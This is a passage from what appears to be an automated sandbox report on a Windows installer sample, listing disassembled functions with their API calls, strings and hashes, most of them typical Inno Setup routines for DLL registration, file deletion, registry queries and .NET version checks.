                                                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2945315188.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2945299426.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2945331467.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_10000000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
                                                                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
                                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                                            • CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
                                                                                                            • GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
                                                                                                            • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
                                                                                                            • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                                            • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                                            • API String ID: 4012871263-351310198
                                                                                                            • Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                                                            • Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
                                                                                                            • Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                                                            • Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                            • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                            • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                            • API String ID: 2323315520-3614243559
                                                                                                            • Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                                                            • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                                                            • Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                                                            • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                                                            APIs
                                                                                                            • 73A1A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                                            • 73A24C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                                            • 73A26180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                                            • 73A24C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                                            • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                                            • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                                            • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                                            • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                                            • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                                            • 73A24C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                                            • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                                            • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                                            • 73A18830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                                            • 73A122A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                                            • 73A24D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1381628555-0
                                                                                                            • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                                            • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                                            • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                                            • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                                                              • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                            • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                                            • API String ID: 2000705611-3392794427
                                                                                                            • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                                            • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                                                            • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                                            • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                            • API String ID: 1452528299-3112430753
                                                                                                            • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                                            • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                                                            • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                                            • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32 ref: 0045C2FA
                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                                                              • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                            • API String ID: 59345061-4263478283
                                                                                                            • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                                            • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                                                            • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                                            • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                                                            APIs
                                                                                                            • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                                            • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                                            • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                                            • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                                            • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                                            • 73A1A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                                                            • String ID:
                                                                                                            • API String ID: 359944910-0
                                                                                                            • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                            • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                                            • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                            • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                            • API String ID: 971782779-3668018701
                                                                                                            • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                                            • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                                                            • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                                            • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                                                              • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                                                            Strings
                                                                                                            • , xrefs: 00453E1A
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                                                            • RegOpenKeyEx, xrefs: 00453E2C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                            • API String ID: 2812809588-1577016196
                                                                                                            • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                                            • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                                                            • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                                            • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                                                            APIs
                                                                                                              • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                                                            Strings
                                                                                                            • .NET Framework not found, xrefs: 00458D3D
                                                                                                            • v4.0.30319, xrefs: 00458C11
                                                                                                            • v2.0.50727, xrefs: 00458C7B
                                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                                                            • v1.1.4322, xrefs: 00458CE2
